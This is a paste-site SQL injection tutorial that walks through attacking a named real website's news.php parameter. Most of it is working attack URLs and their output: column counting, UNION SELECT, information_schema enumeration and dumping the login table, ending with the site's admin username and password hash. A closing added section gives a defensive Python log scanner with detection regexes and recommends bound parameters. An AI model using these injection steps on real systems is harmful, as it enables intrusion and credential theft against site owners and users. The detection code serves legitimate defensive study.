Kyfx

Sql manual Guides

Mar 13th, 2015
http://www.moreanartscenter.org/news.php?id=31' --------> Vulnerable

OK, let's find its columns:

http://www.moreanartscenter.org/news.php?id=31 Order by 1--+ No error
http://www.moreanartscenter.org/news.php?id=31 Order by 2--+ No error
http://www.moreanartscenter.org/news.php?id=31 Order by 13--+ error

That means there are 12 columns. Let's find out the vulnerable columns by typing this:

UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12--+

Full link:
http://www.moreanartscenter.org/news.php?id=31 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12--+

So as a result we got
2
3

We got 3 vulnerable columns :D
Let's inject it ;)

Type group_concat(table_name) in place of the vulnerable column you found, such as "3",

and type this: from information_schema.tables where table_schema=database()--+

instead of this: --+

http://www.moreanartscenter.org/news.php?id=31 UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12 from information_schema.tables where table_schema=database()--+

As a result:

advertisements,category,classes,cms,day,length,login,medium,menu,news,side_content,skill,static,tag

We got all the tables. OK, now here I am going to inject login :D

But before that, go to this site:

http://www.asciitohex.com/

and convert login into hexadecimal:

6c 6f 67 69 6e

Remove the spaces:

6c6f67696e

OK, now we have to type group_concat(column_name) instead of group_concat(table_name)

and

from information_schema.columns where table_name=0xhex_number_of_table--+

instead of

from information_schema.tables where table_schema=database()--+

OK, so it would look like this:

http://www.moreanartscenter.org/news.php?id=31 UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12 from information_schema.columns where table_name=0x6c6f67696e--+

login_id,login_username,login_password,login_level,login_name,login_email,login_date

As you can see, we got all the columns :D

Now we just need to inject login_username,login_password

OK, so in this link:

UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12 remove column_name and type login_username,login_password

and type login--+

instead of from information_schema.columns where table_name=0x6c6f67696e--+

Full link:
http://www.moreanartscenter.org/news.php?id=31 UNION SELECT 1,2,group_concat(login_username,login_password),4,5,6,7,8,9,10,11,12 from login--+

As a result, the admin pass was found :D

Username : admin
Password : fd0057ef2fddb7618e3ab11412bfcc6d
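
From the defender's side, each step of this walkthrough leaves a recognizable request in the web server's access log. The following added example (not part of the original paste) decodes the query string of each logged request and tags the stages seen per client; the log lines, IP addresses, shortened column lists and stage names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Stage name -> pattern, one per step of the walkthrough (names are illustrative).
STAGES = [
    ("quote_probe", re.compile(r"^\d+'$")),
    ("column_count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I)),
    ("hex_literal", re.compile(r"=\s*0x[0-9a-f]{4,}", re.I)),
    ("comment_tail", re.compile(r"(?:--|#)\s*$")),
]
# Minimal access-log shape: client, timestamp, request line, status.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')
_T = '- - [13/Mar/2015:10:00:00 +0000] "GET /news.php?id='
# Constructed log lines: documentation IP ranges, first line is a normal visitor.
SAMPLE_LOG = [
    f'198.51.100.7 {_T}31 HTTP/1.1" 200',
    f'203.0.113.9 {_T}31%27 HTTP/1.1" 500',
    f'203.0.113.9 {_T}31%20Order%20by%2013--+ HTTP/1.1" 500',
    f'203.0.113.9 {_T}31%20UNION%20SELECT%201,group_concat(table_name)%20from%20'
    'information_schema.tables%20where%20table_schema=database()--+ HTTP/1.1" 200',
    f'203.0.113.9 {_T}31%20UNION%20SELECT%201,group_concat(column_name)%20from%20'
    'information_schema.columns%20where%20table_name=0x6c6f67696e--+ HTTP/1.1" 200',
]

def classify(value):
    """Return the names of all stages whose pattern matches one decoded parameter value."""
    return [name for name, rx in STAGES if rx.search(value)]

def scan(lines):
    """Return {client_ip: distinct stages in first-seen order} for flagged requests."""
    seen = {}
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line in the expected shape
        ip, target, _status = m.groups()
        for _key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            for stage in classify(value):
                if stage not in seen.setdefault(ip, []):
                    seen[ip].append(stage)
    return seen

if __name__ == "__main__":
    for ip, stages in scan(SAMPLE_LOG).items():
        print(ip, " -> ".join(stages))
```

Pattern matching like this only surfaces the activity; the fix is to treat `id` as an integer and pass it to the database as a bound parameter instead of building the SQL string from it.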